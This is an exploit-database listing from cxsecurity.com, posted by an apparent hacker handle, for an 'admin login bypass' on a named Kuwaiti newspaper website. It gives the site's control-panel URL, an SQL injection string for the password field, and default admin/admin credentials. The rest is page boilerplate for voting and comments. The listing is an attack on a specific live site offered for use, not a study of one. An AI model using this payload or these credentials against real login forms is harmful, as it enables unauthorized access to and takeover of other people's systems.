جريدة الراصد الكويتية ADMIN LOGIN BYPASS

2020.08.30
ye s49_hack (YE) ye
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|[+] Exploit Title: جريدة الراصد الكويتية ADMIN LOGIN BYPASS |[+] Tested on: Kali Linux |[+] instagram: @s49_hack |[+] Demo: |[+] Vendor site: http://www.alrasedkw.com/cp/ user_pass 'or''=' or : username: admin password: admin


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top